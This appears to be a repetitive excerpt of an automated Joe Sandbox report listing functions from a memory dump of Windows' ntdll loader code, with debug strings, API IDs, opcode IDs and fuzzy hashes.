                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 36DC365C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  • Opcode ID: 0a74f0da8f9e477f1905e1c0c6b80101bcc08b1c0fd815af4c9fcf474cdc363f
                                                  • Instruction ID: b78a2ef0c288b377c31eadde34b5e26ee9d4954356961fd3f03dee9de5294675
                                                  • Opcode Fuzzy Hash: 0a74f0da8f9e477f1905e1c0c6b80101bcc08b1c0fd815af4c9fcf474cdc363f
                                                  • Instruction Fuzzy Hash: 93319BB6D00711EEFB12DB15C88CB2A77B4BB81398F57806AE94463650DBA0DC85C7F1
                                                  Function 36D7245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DBA9A2
                                                  • LdrpDynamicShimModule, xrefs: 36DBA998
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36DBA992
                                                  • apphelp.dll, xrefs: 36D72462
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  • Opcode ID: 5c3e4a86324ff31da7923cca0ab04cd23d4bf155024a29361b9e25154715880f
                                                  • Instruction ID: 8de9ae248fd0d3eb169ae4c7a9a010ed4c4941d9555546426c142f345cd5483a
                                                  • Opcode Fuzzy Hash: 5c3e4a86324ff31da7923cca0ab04cd23d4bf155024a29361b9e25154715880f
                                                  • Instruction Fuzzy Hash: 5B312875A01301EBEB129F6AC844E5ABBB5FB88744FA60059E601B7244CBB0984BDB91
                                                  Function 36E020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$[$]:%u
                                                  • API String ID: 48624451-2819853543
                                                  • Opcode ID: 5e6e0469e92b93f686860aabead349d3df600bd04682ab384d8269f21f6afd5a
                                                  • Instruction ID: 13f7b4af884751e8652b2bef7cbc29c92c7392466859ac3827a00073b872e3c4
                                                  • Opcode Fuzzy Hash: 5e6e0469e92b93f686860aabead349d3df600bd04682ab384d8269f21f6afd5a
                                                  • Instruction Fuzzy Hash: AF2162BAE10219AFDB01DF7ADC40AEE7BF8EF54684F440116E905E3200EB31D909CBA5
                                                  Function 36D4F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3610490719
                                                  • Opcode ID: 7656fd30214d9996bdb506b0ec2734c5f8b7123ef11dc9584fa96c34008055f6
                                                  • Instruction ID: 03de21bd93f5370ca2d2af497cb2ed91a5bc38ec208910d58bbdf5e768aada31
                                                  • Opcode Fuzzy Hash: 7656fd30214d9996bdb506b0ec2734c5f8b7123ef11dc9584fa96c34008055f6
                                                  • Instruction Fuzzy Hash: A1911E71A14751EBE712EF25CC81F2AB7A5AFC4684F000469E9809F6A1DF34EC45CBE2
                                                  Function 36D70BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DBA121
                                                  • Failed to allocated memory for shimmed module list, xrefs: 36DBA10F
                                                  • LdrpCheckModule, xrefs: 36DBA117
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-161242083
                                                  • Opcode ID: 5f3f728ac899fcfb572f4559cc085fb6f7e3396e706979a94888758f5d336688
                                                  • Instruction ID: 60105d90a088a5ff8ea86231d7f065da9080ba3356d8bb0866b6dc746206180c
                                                  • Opcode Fuzzy Hash: 5f3f728ac899fcfb572f4559cc085fb6f7e3396e706979a94888758f5d336688
                                                  • Instruction Fuzzy Hash: B271DFB4E00205DFEB05DF69CD80AAEBBF5EF48304F184069D542EB284E734E946CB62
                                                  Function 36E28927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $File
                                                  • API String ID: 3446177414-2412145507
                                                  • Opcode ID: c790b4645baaa8bb29d44c9c4772d6357360d208f637e3345ab8514ac4a74c14
                                                  • Instruction ID: 7f786f2c7177b17b30681a67b856e530fa34c9abe3ba59f22733422cc1f568e7
                                                  • Opcode Fuzzy Hash: c790b4645baaa8bb29d44c9c4772d6357360d208f637e3345ab8514ac4a74c14
                                                  • Instruction Fuzzy Hash: D2618E71A1022CAFEB669B25CC41BEA77F9AB48704F4441A9E509E6181DA709F88CF64
                                                  Function 36D8C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36DC82E8
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 36DC82DE
                                                  • Failed to reallocate the system dirs string !, xrefs: 36DC82D7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1783798831
                                                  • Opcode ID: 40a96ccc3bb7ae88393be20baa340bb7f3f76d466c3c6aaf7e8972919234b73d
                                                  • Instruction ID: ac16a913122b1979159fe19ba80d2a2d066a05d298eea647e4d463ce6cb35954
                                                  • Opcode Fuzzy Hash: 40a96ccc3bb7ae88393be20baa340bb7f3f76d466c3c6aaf7e8972919234b73d
                                                  • Instruction Fuzzy Hash: 764123B5916304EBD721DB35CC44F4B7BE8EF44650F40452AFA44E7250EB34D80ACBA6
                                                  Function 36D8BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 36DC7B8E
                                                  • RTL: Re-Waiting, xrefs: 36DC7BAC
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 36DC7B7F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: 7dce71ba99997e1ff1af330c256152186fa26136aff3e2507f7eb85dbb6a34f3
                                                  • Instruction ID: 0f66feedf72f8244c92ecfc53bfb14a1c7e6a9c2716acb3fde84df95e8a456f6
                                                  • Opcode Fuzzy Hash: 7dce71ba99997e1ff1af330c256152186fa26136aff3e2507f7eb85dbb6a34f3
                                                  • Instruction Fuzzy Hash: 4841BD79B057029FE721CB25CC44B5ABBF5EF98714F100A1DE8A99B280DB21E405CB91
                                                  Function 36D8B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 36DC728C
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 36DC72A3
                                                  • RTL: Re-Waiting, xrefs: 36DC72C1
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 36DC7294
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: 41123125d0cdfb54aba32ddbbc33973cefdeb55c9a8c9a832fd7b2c75a83bb93
                                                  • Instruction ID: d3a2d32131b7e55e9a337f5c23a45037897220eacb52d394ad37f449d49560aa
                                                  • Opcode Fuzzy Hash: 41123125d0cdfb54aba32ddbbc33973cefdeb55c9a8c9a832fd7b2c75a83bb93
                                                  • Instruction Fuzzy Hash: 6A41F075A00316AFE720CF25CC45B56BBB5FF88758F240619F8A4EB240DB20E806CBE1
                                                  Function 36DD4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 36DD4899
                                                  • LdrpCheckRedirection, xrefs: 36DD488F
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36DD4888
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 3446177414-3154609507
                                                  • Opcode ID: 142b79a8e5b671fa74a630d8f83c6d11e5df97e17f3953b1b67fd48df4ccc61c
                                                  • Instruction ID: 4788e04af0d1005ee3dc50894c5e2c4d5f5d3d30b5ba2da2fcb896a814c298b8
                                                  • Opcode Fuzzy Hash: 142b79a8e5b671fa74a630d8f83c6d11e5df97e17f3953b1b67fd48df4ccc61c
                                                  • Instruction Fuzzy Hash: 0841AD76E15360EFDB11EF69C840A16BBE9AF89690F010569ED98E7351D730E804CBE1
                                                  Function 36E02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 117fa8035077f66ff5911ac07bbe5438611ba0a336f54484b304f938355ba24f
                                                  • Instruction ID: 3f9f17b0a9920003312ff653456dc79c27f8e3cc8ddedfb9619d70b1fe881a88
                                                  • Opcode Fuzzy Hash: 117fa8035077f66ff5911ac07bbe5438611ba0a336f54484b304f938355ba24f
                                                  • Instruction Fuzzy Hash: 8A318676900219AFDB10DF2ACC44BEEB7F8EB44754F904555E849E3240EB34DA49CFA1
                                                  Function 36DD5F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Wow64 Emulation Layer
                                                  • API String ID: 3446177414-921169906
                                                  • Opcode ID: 4223a5aa1c043bd7df7437d52c680808e5200226cd974e6202692e673d82258c
                                                  • Instruction ID: a829aedfdf454d37537c594b3e13be9c5415e2ca20b3b45a864b8abff70c7378
                                                  • Opcode Fuzzy Hash: 4223a5aa1c043bd7df7437d52c680808e5200226cd974e6202692e673d82258c
                                                  • Instruction Fuzzy Hash: 7B21367690111DBFAF01AAA28C84CBF7F7DEF45298B414464FA01A6200EA34DE0ADB30
                                                  Function 36E27CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: c5b20a6015e2f26eb13a7b6789df54091136e2538e2e647e2d1b8ed6eaa02afd
                                                  • Instruction ID: ac4462c276c9d39a67474ec10654d7ba4050f089d81e0346c39462ae2afb6e6f
                                                  • Opcode Fuzzy Hash: c5b20a6015e2f26eb13a7b6789df54091136e2538e2e647e2d1b8ed6eaa02afd
                                                  • Instruction Fuzzy Hash: 93E16271E00309AFEF15DFA5C845BEEBBB5BF48354F24812AE515EB280E7709949CB50
                                                  Function 36D7EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 183c133dc8ee99217d999308f436fa8347baa7adfde4f52d43aba0c589a14173
                                                  • Instruction ID: c67d71aa831411625b469fd2f29f4c247b6941c4b42b23092509d44fa2ce457b
                                                  • Opcode Fuzzy Hash: 183c133dc8ee99217d999308f436fa8347baa7adfde4f52d43aba0c589a14173
                                                  • Instruction Fuzzy Hash: AFE102B5D00718DFEB21CFAAC980A9DFBF1BF48314F20452AE955AB660D770A845CF52
                                                  Function 36DCEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 02b4fc19769540c1eee644a7e188ecca220967d7d44f7a83a69323d20bc7e80d
                                                  • Instruction ID: fd5277f3bf44643dbca4fa11a3ce80263258b07c4ef171853dd4aa63d3c8b221
                                                  • Opcode Fuzzy Hash: 02b4fc19769540c1eee644a7e188ecca220967d7d44f7a83a69323d20bc7e80d
                                                  • Instruction Fuzzy Hash: 927104B1E0021D9FDF05CFA9D980ADDBBB5BF48354F15412AEA05BB258D734A905CFA0
                                                  Function 36E2A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: e03e0146cafaba78d49adc87959a00a655c1248c6f55da4b0c7e27ba86d1f5e2
                                                  • Instruction ID: ee70dd75ee3a9c2122ab3eb5afbe50e1efb7e4180f00aca733e6a39dac10f88c
                                                  • Opcode Fuzzy Hash: e03e0146cafaba78d49adc87959a00a655c1248c6f55da4b0c7e27ba86d1f5e2
                                                  • Instruction Fuzzy Hash: 6C517D74B50A229FEB08EE5DC4A0A1A77F3BB49358B25406DD906D7710DBB4EC49CB80
                                                  Function 36DCF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 4dce5fd3c465b3323591dff6bdc128bd81ca8f72dd6ab08ae8bbd8246e003376
                                                  • Instruction ID: 647fb69a9e5f2d6bd6e4b1380fbbf9f4d60638c81142503738162790d4f7c9ba
                                                  • Opcode Fuzzy Hash: 4dce5fd3c465b3323591dff6bdc128bd81ca8f72dd6ab08ae8bbd8246e003376
                                                  • Instruction Fuzzy Hash: 635132B6E0021DAFEF05CFA9C840ADDBBB6BF48354F15812AE905BB258D7349905CF60
                                                  Function 36D87B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                  • String ID:
                                                  • API String ID: 4281723722-0
                                                  • Opcode ID: 0edf035cb2fc1209e970d41fd1f0b0bc34632f601c9158b55c4a5671ceb74aef
                                                  • Instruction ID: 76896d5c15aeb479b8bb585195b2f267f11d7415f6280cb90b65bc3c09da0a1e
                                                  • Opcode Fuzzy Hash: 0edf035cb2fc1209e970d41fd1f0b0bc34632f601c9158b55c4a5671ceb74aef
                                                  • Instruction Fuzzy Hash: C7312475E05228AFCF05DFA8C844A9EBBF1BB48724F10412AE511F7290DB359906CF64
                                                  Function 36D559C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 4565e3b9f2c861d8e57e0549d9cfd39b11c1539cabee76aa4947017010f331d1
                                                  • Instruction ID: 69a8d2609156deed3ddfdb762573ea6c0866a75b36eca659c8b1126013ccf42f
                                                  • Opcode Fuzzy Hash: 4565e3b9f2c861d8e57e0549d9cfd39b11c1539cabee76aa4947017010f331d1
                                                  • Instruction Fuzzy Hash: EC323674D04369DFEF22CF65C844BDDBBB0AB08308F1141EAD649A7A51DB746A84CF91
                                                  Function 36D97D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction ID: e69a7b3ae4b629c4a646c3a70dc3ead732eb14e8e6ed77f1c25a9187fc3e1869
                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction Fuzzy Hash: F991A474E002169FEB14DF6AC8856EEB7F5FF84769F60451AE854E72C0EB309940C761
                                                  Function 36D84C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
